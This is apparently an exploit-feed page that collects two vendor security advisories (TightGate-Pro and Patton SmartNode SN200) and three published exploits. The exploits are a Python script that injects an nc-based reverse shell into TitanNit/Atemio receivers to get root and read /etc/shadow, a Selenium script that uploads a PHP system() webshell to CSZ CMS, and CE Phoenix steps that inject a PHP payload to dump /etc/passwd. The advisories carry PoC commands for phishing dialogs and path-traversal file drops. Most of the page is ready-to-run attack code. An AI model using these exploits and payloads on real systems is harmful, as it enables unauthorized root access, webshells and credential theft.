Latest exploits :: CodePwn

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231122-0 > ======================================================================= title: Multiple Vulnerabilities product: m-privacy TightGate-Pro vulnerable version: Rolling Release, servers with the following package versions are vulnerable: tightgatevnc < 4.1.2~1 rsbac-policy-tgpro < 2.0.159 mprivacy-tools < 2.0.406g fixed version: Servers with the following package versions and higher: mprivacy-tools_2.0.406g tightgatevnc_4.1.2~1 rsbac-policy-tgpro_2.0.159 CVE number: CVE-2023-47250, CVE-2023-47251 impact: high homepage: https://www.m-privacy.de/en/tightgate-pro-safe-surfing/ found: 2023-08-18 by: Daniel Hirschberger (Office Bochum) Steven Kurka (Office Essen) Marco Schillinger (Office Nürnberg) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "TightGate-Pro is a ReCoB system. ReCoBS stands for Remote-Controlled Browser System, literally translated 'remote-controlled web browser'. TightGate-Pro physically separates the web browser execution environment from the workstation. The system thus shields the internal network from the Internet and reliably and preventively prevents attacks via the web browser. TightGate-Pro is the strongest dedicated ReCoBS, because only physical outsourcing on a hardened system permanently withstands attacks. Local virtualisations, sandboxing systems or micro-virtualisations do not offer effective protection. TightGate-Pro is used in public authorities, financial institutions, industrial companies and critical infrastructures – in short, everywhere where “safe surfing on the Internet” is indispensable at the workplace and internal infrastructures must be reliably protected. TightGate-Pro is BSI-certified according to EAL3+." Source: https://www.m-privacy.de/en/tightgate-pro-safe-surfing/ Business recommendation: ------------------------ The vendor provides a patch which should be installed immediately. SEC Consult highly recommends to perform a thorough security review of the product conducted by security professionals to identify and resolve potential further security issues. Vulnerability overview/description: ----------------------------------- 1) Code Execution Execution of single commands and scripts is possible with the privileges of the current user. Code execution is possible with any file type on the server and no specific permissions need to be set for the utilized file. Vendor response (translated): "It is intended behavior to execute arbitrary bash scripts. It is not possible to execute arbitrary programs and libraries. There is no privilege escalation possible with this vulnerability." We can confirm that it was not possible to escalate privileges during our test. 2) Access to all Desktops (CVE-2023-47250) Multiple users are connecting to the same TightGate-Pro server, resulting in one instance of the X11 window system. Due to insecure permissions of the X11 sockets it is possible for any user to open arbitrary windows on the desktop of other users for phishing attacks or installing a keylogger directly. Vendor response (translated): "We acknowledge this issue as a important vulnerability. A fix with full RSBAC-Jail-Separation and changed Linux-Filesystem permissions is currently available in the "Prestable" packages: - mprivacy-tools_2.0.406g - tightgatevnc_4.1.2~1 - rsbac-policy-tgpro_2.0.159 These can be applied by the admin user "update". The updates will be provided automatically as Hotfix around 2023-10-24." 3) File Transfer by Abusing the Print function (CVE-2023-47251) TightGate-Pro allows printing PDF documents on the host system. Documents are transferred to the host, printed and deleted afterwards. An attacker is able to control the path of the transferred file and to prevent the automatic deletion of the file. Vendor response (translated): "This is not a severe finding but we already fixed it. The fixes are available in the packages: - mprivacy-tools_2.0.406g - tightgatevnc_4.1.2~1 Now the .spool directly is always scanned for malicious data and the VNC- client does not transfer files which contain path symbols (e.g. ../)." 4) Outdated Update Server Based on disclosed version numbers the update server is running outdated software with known vulnerabilities. The criticality of this issue depends on the exploitability of these issues. Vendor response (translated): "The old version of thttpd is already known. This is not seen as security-relevant. The access to the updateserver requires a previous registration of a customer- provided SSH key, which is only available to administrators on the TightGate-Pro instance. thttpd is isolated on the updateserver and can only *read* files. Even if an attacker can write malicious updatepackages, these are still secured by a cryptographic signature and would not be installed on TightGate-Pro instances. We will eventually replace thttpd with lighthttpd which is still supported." Proof of concept: ----------------- 1) Code Execution Code execution is possible using the context menu of any file in the VNC session of TightGate-Pro. Selecting "Öffnen mit" (Open with) in the context menu of any file and selecting the "Benutzerdefinierte Befehlszeile" (custom commandline) section of the menu allows to provide a custom shell command to be executed: [advisory_ce_open_with.png] [advisory_ce_custom_command.png] At this point there are two possible options: In case the selected file is a bash script typing `/bin/bash` as custom command will execute the script. For this PoC the following script has been used: ``` #!bin/bash echo poc >> /home/user/testuser/Desktop/test/PoC2.txt ``` In case any other file is selected a complete command can be used as well. A possible example is listed below: `/bin/bash -c "echo poc >> /home/user/testuser/Desktop/test/PoC2.txt"` According to vendor, arbitrary code execution is not possible as programs and libraries won't be executed. 2) Access to all Desktops (CVE-2023-47250) A normal user without special permissions has read and write access to all X11 sockets stored in the temp folder of the user TightGate-Pro, visible in the following screenshot: [advisory_desktop_access_x11_perms.png] This allows any user for example to open dialogue boxes on the desktop of the currently connected users as shown in the following screenshots. The command used is listed below. `/bin/bash -c 'for i in $(ls /home/tmpdir/tmp510/.X11-unix | cut -b 2-); do DISPLAY=unix:"$i".0 zenity --password --username & done;'` [advisory_desktop_access_gui_triggered.png] As it can be seen in the following screenshot any input to the dialogue boxes can be read by the attacker. [advisory_desktop_access_result.png] 3) File Transfer by Abusing the Print function (CVE-2023-47251) File transfers can be triggered for PDF files which are stored in the `/home/user/.spool/<username>` directory. By setting a relative path as file name, the file can be stored in any user directory on the host system. In case the file name contains Unicode characters, deletion of the file is not executed after transfer and closing of the print prompt. To store a file on the user's desktop, the name `..\\..\\..\\..\\..\\Desktop\\Ỻeicar.pdf` can be used. The transfer can then be triggered by sending the signal `SIGUSR2` to the `Xtightgatevnc` process: ``` cp eicar.pdf '/home/user/.spool/<username>/..\\..\\..\\..\\..\\Desktop\\Ỻeicar.pdf' pkill -u $USER --signal SIGUSR2 Xtightgatevnc ``` In addition, this file transfer does not check if any malicious files are transferred to the host system. The following screenshot shows the warning of a malware scanner after an eicar testfile was transferred. It is therefore possible to circumvent the malware scanner of TightGate-Pro which only runs if the intended way of transfer, namely the TightGate-Schleuse, is used. [advisory_file_transfer_mal_file.png] 4) Outdated Update Server Access to the update server is possible with the ssh key stored at `/etc/cu/id_ed25519` and ssh port forwarding. The ssh key is customized for each customer. Root access is needed to retrieve the key. The command used for the forwarding is listed below: ``` ssh -N -L 8000:localhost:85 tgpro13@update.m-privacy.de -i id_ed25519 -v ``` Afterwards access is possible at `http:127.0.0.1:8000`. The server headers return the version of the webserver: `thttpd/2.25b 29dec2003` [advisory_outdated_server.png] This version has in sum four known vulnerabilities (high and medium) listed: * CVE-2006-1078 * CVE-2006-1079 * CVE-2007-0664 * CVE-2009-4491 Vulnerable / tested versions: ----------------------------- A TightGate-Pro server with the following package versions was used for testing: * tightgatevnc < 4.1.2~1 * rsbac-policy-tgpro < 2.0.159 * mprivacy-tools < 2.0.406g Vendor contact timeline: ------------------------ 2023-10-11: Contacting vendor through info@m-privacy.de via GPG 2023-10-13: CEO of m-privacy phones us and thanks us for the advisory, a developer will send us a written statement next week. 2023-10-16: Received a written statement of their lead developer; the vulnerabilities #2 (Access to all Desktops) and #3 (File Transfer by Abusing the Print function) are confirmed and a fix is available #1 is seen as a feature not a bug, #4 is claimed to be prevented by hardening measures on the server, also thttpd will be replaced by lighthttpd in the future. 2023-10-24: We ask for some clarifications regarding software versions and advisory publication date. 2023-10-29: Vendor provides software version information and asks us to publish the advisory after 2023-11-06. 2023-11-22: Public release of security advisory. Solution: --------- Install the "Prestable" packages or wait until they are available as hotfix: * mprivacy-tools_2.0.406g * tightgatevnc_4.1.2~1 * rsbac-policy-tgpro_2.0.159 Workaround: ----------- None Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Eviden business. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Daniel Hirschberger, Steven Kurka, Marco Schillinger / @2023 </code></pre>

<pre><code>Advisory ID: SYSS-2023-019 Product: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway Manufacturer: Patton LLC Affected Version(s): <= 3.21.2-23021 Tested Version(s): 2.21.1-22041, 3.21.2-23021, 3.22.0-23083 Vulnerability Type: OS Command Injection (CWE-78) Vulnerability Type: Improper Access Control (CWE-284) Risk Level: High Solution Status: Open Manufacturer Notification: 2023-07-05 Public Disclosure: 2023-08-28 CVE Reference: CVE-2023-41109 Author of Advisory: Maurizio Ruchay, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: SmartNode SN200 is a VoIP appliance which is manufactured and distributed by Patton LLC. The manufacturer describes the product as follows (see [1]): "The SmartNode 200 Series of VoIP Analog Telephone Adapter and VoIP Phone Adapter Gateways support up to four telephone connections. VoIP Analog Phone Adapter integrates legacy Phones and Fax machines into a UCC Environment. High-quality voice and reliable fax over any IP network. All-IP does not end when analog terminals have to be integrated. Security and quality guaranteed." Due to an error in the authorization mechanism and improper input validation, the device allows unauthenticated adversaries to execute OS commands via the web interface. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: SySS GmbH found an unauthenticated OS command injection vulnerability in SmartNode 200 (SN200) devices. The SN200 devices offer a "Network Diagnostic Commands" feature to administrative users. This feature is designed to execute network diagnostic commands like ping. However, as SySS GmbH discovered, the feature can be used to execute arbitrary system commands. Furthermore, a flaw in the authorization mechanism was found. This issue allows unauthenticated adversaries to execute system commands via the affected feature. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): The following HTTP request shows how the system command "id" is executed on the device: === POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1 Cookie: AuthToken=; AuthGroup=superuser; UserName=admin [... shortened ...] Connection: close {"cmd":"/usr/bin/id","arguments":[]} === The following output from the web interface shows that the command has been executed: === *** Command started *** [... shortened ...] uid=0(root) gid=0(root) PING 127.0.0.1 (127.0.0.1): 56 data bytes 64 bytes from 127.0.0.1: seq=0 ttl=64 time=1.025 ms 64 bytes from 127.0.0.1: seq=1 ttl=64 time=1.781 ms *** Command completed *** === Especially noteworthy is that an empty cookie "AuthToken" can be used in order to bypass the authorization checks. Since the vulnerability is still active, parts of the PoC have been redacted. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: A patch for this issue is not yet available. Therefore, it is recommended to disable the vulnerable "Network Diagnostic Commands" feature if possible. Furthermore, it is advised to block network access to the HTTP interface either on the device directly or via firewall. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2023-06-28: Vulnerability discovered 2023-07-05: Vulnerability reported to manufacturer 2023-08-28: Public disclosure of vulnerability 2023-10-13: Vulnerability confirmation on the newly released update 3.22.0-23083 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for SmartNode SN200 https://www.patton.com/voip-gateway/sn200/ [2] OWASP OS Command Injection Defense Cheat Sheet https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html [3] SySS Responsible Disclosure Policy https://www.syss.de/en/responsible-disclosure-policy [4] SySS Security Advisory SYSS-2023-019 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Maurizio Ruchay of SySS GmbH. E-Mail: maurizio.ruchay@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Maurizio_Ruchay.asc Key ID: 0xEDA7235FA5478A8C Key Fingerprint: 9AA6 D02F C74F 3EDE C1CE AE51 EDA7 235F A547 8A8C ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en </code></pre>

<pre><code>#!/usr/bin/env python # -*- coding: utf-8 -*- # # # TitanNit Web Control 2.01 / Atemio 7600 Root Remote Code Execution # # # Vendor: AAF Digital HD Forum | Atelmo GmbH # Product web page: http://www.aaf-digital.info | https://www.atemio.de # Affected version: Firmware <=2.01 # # Summary: The Atemio AM 520 HD Full HD satellite receiver enables the # reception of digital satellite programs in overwhelming image quality # in both SD and HD ranges. In addition to numerous connections, the small # all-rounder offers a variety of plugins that can be easily installed # thanks to the large flash memory. The TitanNit Linux software used combines # the advantages of the existing E2 and Neutrino systems and is therefore # fast, stable and adaptable. # # Desc: The vulnerability in the device enables an unauthorized attacker # to execute system commands with elevated privileges. This exploit is # facilitated through the use of the 'getcommand' query within the application, # allowing the attacker to gain root access. # # ======================================================================== # _# python titannnit_rce.py 192.168.1.13:20000 192.168.1.8 9999 # [*] Starting callback listener child thread # [*] Listening on port 9999 # [*] Generating callback payload # [*] Calling # [*] Callback waiting: 3s # [*] ('192.168.1.13', 40943) called back # [*] Rootshell session opened # sh: cannot set terminal process group (1134): Inappropriate ioctl for device # sh: no job control in this shell # sh-5.1# id # <-sh-5.1# id # uid=0(root) gid=0(root) # sh-5.1# cat /etc/shadow | grep root # <-sh-5.1# cat /etc/shadow | grep root # root:$6$TAdBGj2mY***:18729:0:99999:7::: # sh-5.1# exit # [*] OK, bye! # # _# # ======================================================================= # # Tested on: GNU/Linux 2.6.32.71 (STMicroelectronics) # GNU/Linux 3.14-1.17 (armv7l) # GNU/Linux 3.14.2 (mips) # ATEMIO M46506 revision 990 # Atemio 7600 HD STB # CPU STx7105 Mboard # titan web server # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2023-5801 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php # # # 16.11.2023 # from time import sleep import threading import requests import socket import sys class RemoteControl: def __init__(self): self.timeout = 10 self.target = None self.callback = None self.cstop = threading.Event() self.path = "/query?getcommand=&cmd=" self.lport = None self.cmd = None def beacon(self): self.cmd = "mkfifo /tmp/j;cat /tmp/j|sh -i 2>&1|nc " self.cmd += self.callback + " " self.cmd += str(self.lport) + " " self.cmd += ">/tmp/j" self.path += self.cmd r = requests.get(self.target + self.path) def slusaj(self): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind(("0.0.0.0", self.lport)) s.listen(1) print("[*] Listening on port " + str(self.lport)) sleep(1) try: conn, addr = s.accept() print("\n[*]", addr, "called back") print("[*] Rootshell session opened") self.cstop.set() except socket.timeout: print("[-] Call return timeout\n[!] Check your ports") conn.close() while True: try: odg = conn.recv(999999).decode() sys.stdout.write(odg) command = input() command += "\n" if "exit" in command: exit(-17) conn.send(command.encode()) sleep(0.5) sys.stdout.write("<-" + odg.split("\n")[-1]) except: print("[*] OK, bye!") exit(-1) s.close() def tajmer(self): for z in range(self.timeout, 0, -1): poraka = f"[*] Callback waiting: {z}s" print(poraka, end='', flush=True) sys.stdout.flush() sleep(1) if self.cstop.is_set(): break print(' ' * len(poraka), end='\r') if not self.cstop.is_set(): print("[-] Call return timeout\n[!] Check your ports") exit(0) else: print(end=' ') def thricer(self): print("[*] Starting callback listener child thread") plet1 = threading.Thread(name="ZSL", target=self.slusaj) plet1.start() sleep(1) print("[*] Generating callback payload") sleep(1) print("[*] Calling") plet2 = threading.Thread(name="ZSL", target=self.tajmer) plet2.start() self.beacon() plet1.join() plet2.join() def howto(self): if len(sys.argv) != 4: self.usage() else: self.target = sys.argv[1] self.callback = sys.argv[2] self.lport = int(sys.argv[3]) if not self.target.startswith("http"): self.target = "http://{}".format(self.target) def dostabesemolk(self): naslov = """ o===--------------------------------------===o | | | TitanNit Web Control Remote Code Execution | | ZSL-2023-5801 | | | o===--------------------------------------===o || || || || || || || || L! /_) / /L _______________________/ (__) _______________________ (__) \_(__) || || || || || || """ print(naslov) def usage(self): self.dostabesemolk() print("Usage: ./titan.py <target ip> <listen ip> <listen port>") print("Example: ./titan.py 192.168.1.13:20000 192.168.1.8 9999") exit(0) def main(self): self.howto() self.thricer() if __name__ == '__main__': RemoteControl().main() </code></pre>

<pre><code># Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution # Date: 17/11/2023 # Exploit Author: tmrswrr # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download # Version: Version 1.3.0 # Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS import os import zipfile from selenium import webdriver from selenium.webdriver.common.by import By from selenium.webdriver.firefox.options import Options as FirefoxOptions from selenium.webdriver.firefox.service import Service as FirefoxService from webdriver_manager.firefox import GeckoDriverManager from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC from selenium.common.exceptions import NoSuchElementException, TimeoutException import requests from time import sleep import sys import random import time import platform import tarfile from io import BytesIO email = "admin@admin.com" password = "password" class colors: OKBLUE = '\033[94m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' CBLACK = '\33[30m' CRED = '\33[31m' CGREEN = '\33[32m' CYELLOW = '\33[33m' CBLUE = '\33[34m' CVIOLET = '\33[35m' CBEIGE = '\33[36m' CWHITE = '\33[37m' color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING, colors.CRED, colors.CBEIGE] random.shuffle(color_random) def entryy(): x = color_random[0] + """ ╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮ ┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃ ┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯ ┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃ ┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃ ╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯ << CSZ CMS Version 1.3.0 RCE >> << CODED BY TMRSWRR >> << GITHUB==>capture0x >> \n""" for c in x: print(c, end='') sys.stdout.flush() sleep(0.0045) oo = " " * 6 + 29 * "░⣿" + "\n\n" for c in oo: print(colors.CGREEN + c, end='') sys.stdout.flush() sleep(0.0065) tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "\n\n" for c in tt: print(colors.CWHITE + c, end='') sys.stdout.flush() sleep(0.0065) xx = " " * 6 + 29 * "░⣿" + "\n\n" for c in xx: print(colors.CGREEN + c, end='') sys.stdout.flush() sleep(0.0065) def check_geckodriver(): current_directory = os.path.dirname(os.path.abspath(__file__)) geckodriver_path = os.path.join(current_directory, 'geckodriver') if not os.path.isfile(geckodriver_path): red = "\033[91m" reset = "\033[0m" print(red + "\n\nGeckoDriver (geckodriver) is not available in the script's directory." + reset) user_input = input("Would you like to download it now? (yes/no): ").lower() if user_input == 'yes': download_geckodriver(current_directory) else: print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset) sys.exit(1) def download_geckodriver(directory): print("[*] Detecting OS and architecture...") os_name = platform.system().lower() arch, _ = platform.architecture() if os_name == "linux": os_name = "linux" arch = "64" if arch == "64bit" else "32" elif os_name == "darwin": os_name = "macos" arch = "aarch64" if platform.processor() == "arm" else "" elif os_name == "windows": os_name = "win" arch = "64" if arch == "64bit" else "32" else: print("[!] Unsupported operating system.") sys.exit(1) geckodriver_version = "v0.33.0" geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}" ext = "zip" if os_name == "win" else "tar.gz" url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}" print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...") response = requests.get(url, stream=True) if response.status_code == 200: print("[*] Extracting GeckoDriver...") if ext == "tar.gz": with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar: tar.extractall(path=directory) else: with zipfile.ZipFile(BytesIO(response.content)) as zip_ref: zip_ref.extractall(directory) print("[+] GeckoDriver downloaded and extracted successfully.") else: print("[!] Failed to download GeckoDriver.") sys.exit(1) def create_zip_file(php_filename, zip_filename, php_code): try: with open(php_filename, 'w') as file: file.write(php_code) with zipfile.ZipFile(zip_filename, 'w') as zipf: zipf.write(php_filename) print("[+] Zip file created successfully.") os.remove(php_filename) return zip_filename except Exception as e: print(f"[!] Error creating zip file: {e}") sys.exit(1) def main(base_url, command): if not base_url.endswith('/'): base_url += '/' zip_filename = None check_geckodriver() try: firefox_options = FirefoxOptions() firefox_options.add_argument("--headless") script_directory = os.path.dirname(os.path.abspath(__file__)) geckodriver_path = os.path.join(script_directory, 'geckodriver') service = FirefoxService(executable_path=geckodriver_path) driver = webdriver.Firefox(service=service, options=firefox_options) print("[*] Exploit initiated.") # Login driver.get(base_url + "admin/login") print("[*] Accessing login page...") driver.find_element(By.NAME, "email").send_keys(f"{email}") driver.find_element(By.NAME, "password").send_keys(f"{password}") driver.find_element(By.ID, "login_submit").click() print("[*] Credentials submitted...") try: error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]") if error_message.is_displayed(): print("[!] Login failed: Invalid credentials.") driver.quit() sys.exit(1) except NoSuchElementException: print("[+] Login successful.") # File creation print("[*] Preparing exploit files...") php_code = f"<?php echo system('{command}'); ?>" zip_filename = create_zip_file("exploit.php", "payload.zip", php_code) driver.get(base_url + "admin/upgrade") print("[*] Uploading exploit payload...") file_input = driver.find_element(By.ID, "file_upload") file_input.send_keys(os.path.join(os.getcwd(), zip_filename)) # Uploading driver.find_element(By.ID, "submit").click() WebDriverWait(driver, 10).until(EC.alert_is_present()) alert = driver.switch_to.alert alert.accept() # Exploit result exploit_url = base_url + "exploit.php" response = requests.get(exploit_url) print(f"[+] Exploit response:\n\n{response.text}") except Exception as e: print(f"[!] Error: {e}") finally: driver.quit() if zip_filename and os.path.exists(zip_filename): os.remove(zip_filename) if __name__ == "__main__": entryy() if len(sys.argv) < 3: print("Usage: python script.py [BASE_URL] [COMMAND]") else: main(sys.argv[1], sys.argv[2]) </code></pre>

<pre><code>## Exploit Title: CE Phoenix v1.0.8.20 - Remote Code Execution (RCE) (Authenticated) #### Date: 2023-11-25 #### Exploit Author: tmrswrr #### Category: Webapps #### Vendor Homepage: [CE Phoenix](https://phoenixcart.org/) #### Version: v1.0.8.20 #### Tested on: [Softaculous Demo - CE Phoenix](https://www.softaculous.com/apps/ecommerce/CE_Phoenix) ### POC: <img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/1.png" alt="Magento Image" width="1000"> <img src="https://raw.githubusercontent.com/capture0x/Phoenix/main/2.png" alt="Magento Image" width="1000"> 1. **Login to admin panel:** - Visit: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/admin/define_language.php?lngdir=english` 2. **Access english.php:** - Click on `english.php` and inject the payload: ``` <?php echo system('cat /etc/passwd'); ?> ``` 3. **Save Changes:** - Save the modified file. 4. **View Results:** - Visit the main page: `https://demos6.softaculous.com/CE_Phoenixvkqhcarjmw/` - You will see the following result: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false webuzo:x:993:993::/home/webuzo:/bin/bash apache:x:992:991::/home/apache:/sbin/nologin apache:x:992:991::/home/apache:/sbin/nologin </code></pre>